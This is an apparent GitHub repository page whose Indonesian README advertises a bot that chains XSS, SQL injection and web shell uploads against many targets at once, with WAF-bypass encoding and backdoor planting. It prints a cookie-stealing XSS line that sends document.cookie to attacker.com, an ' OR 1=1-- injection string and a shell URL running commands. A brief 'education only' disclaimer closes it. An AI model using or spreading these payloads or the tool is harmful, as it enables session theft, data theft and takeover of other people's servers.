https://github.com/cyberheroess/xss-sqli
XSS + SQL Injection + Web Shell Upload Bot
https://github.com/cyberheroess/xss-sqli
sql-injection sqlalchemy sqlite sqlite3 xss xss-attacks xss-detection xss-exploitation xss-scanner xss-vulnerability
Last synced: 2 months ago
JSON representation
XSS + SQL Injection + Web Shell Upload Bot
- Host: GitHub
- URL: https://github.com/cyberheroess/xss-sqli
- Owner: Cyberheroess
- Created: 2025-03-08T01:45:02.000Z (over 1 year ago)
- Default Branch: main
- Last Pushed: 2025-03-08T02:09:41.000Z (over 1 year ago)
- Last Synced: 2025-03-08T02:26:32.113Z (over 1 year ago)
- Topics: sql-injection, sqlalchemy, sqlite, sqlite3, xss, xss-attacks, xss-detection, xss-exploitation, xss-scanner, xss-vulnerability
- Language: Python
- Homepage:
- Size: 0 Bytes
- Stars: 1
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# XSS-SQLI
XSS + SQL Injection + Web Shell Upload Bot
---
# **XSS + SQL Injection + Web Shell Upload Bot**
**Versi: 1.0**
## **📌 Tentang Script Ini**
Script ini adalah **bot sederhana** yang menggabungkan tiga teknik serangan web yang umum:
1️⃣ **XSS (Cross-Site Scripting)** → Menyisipkan script berbahaya untuk mencuri **cookie/session** user.
2️⃣ **SQL Injection** → Mengeksploitasi celah SQL untuk mendapatkan **data sensitif** dari database.
3️⃣ **Web Shell Upload** → Mengunggah file shell untuk mendapatkan **akses penuh ke server**.
---
## **⚙️ Cara Kerja Script**
✅ **User memasukkan target** (manual atau dari file).
✅ **Bot menjalankan serangan berurutan** (XSS → SQLi → Web Shell).
✅ **Jika SQL Injection berhasil**, lanjut **upload web shell** otomatis.
✅ **Serangan dilakukan dengan encoding canggih** untuk **bypass WAF**.
✅ **Menggunakan multi-threading** supaya bisa menyerang banyak target sekaligus.
---
## **📂 Fitur Utama**
✔️ **XSS Payload terenkripsi** → Meminimalkan deteksi oleh WAF.
✔️ **Bypass WAF SQL Injection** → Menggunakan payload yang lebih stealth.
✔️ **Web Shell Upload** → Menyisipkan backdoor di server target.
✔️ **Bot otomatis multi-threading** → Bisa menyerang banyak target dalam waktu singkat.
✔️ **Error Handling** → Script tidak akan crash jika target mati atau tidak responsif.
---
## **🚀 Cara Menggunakan**
### **1️⃣ Jalankan Script**
```bash
python3 xss_sqli_shell.py
```
### **2️⃣ Pilih Metode Input Target**
1️⃣ **Manual** → Masukkan URL target satu per satu.
2️⃣ **Dari File** → Masukkan daftar target dari file (`targets.txt`).
**Contoh format file `targets.txt`**
```
http://victim.com/vuln.php?input=
http://testsite.com/comment.php?msg=
```
---
## **🔴 Contoh Serangan**
📌 **XSS Attack:**
```html
document.location='http://attacker.com/steal.php?cookie='+document.cookie
```
📌 **SQL Injection:**
```sql
' OR 1=1--
```
📌 **Web Shell Upload:**
- Mengunggah file `shell.php` berisi:
```php
```
- Setelah berhasil, akses shell:
```
http://target.com/uploads/shell.php?cmd=whoami
```
---
## **📌 Catatan**
🔹 Script ini **sederhana** dan hanya untuk **edukasi** tentang keamanan web.
🔹 Jangan digunakan untuk hal ilegal! Gunakan hanya di **sistem yang Anda miliki atau izin resmi**.
🔹 **Pastikan memahami konsep dasar keamanan web** sebelum menggunakan script ini.
---
## **👨💻 Dibuat Oleh**
🛠️ **Cyber-Heroes** - Edukasi & Eksperimen Keamanan Web
---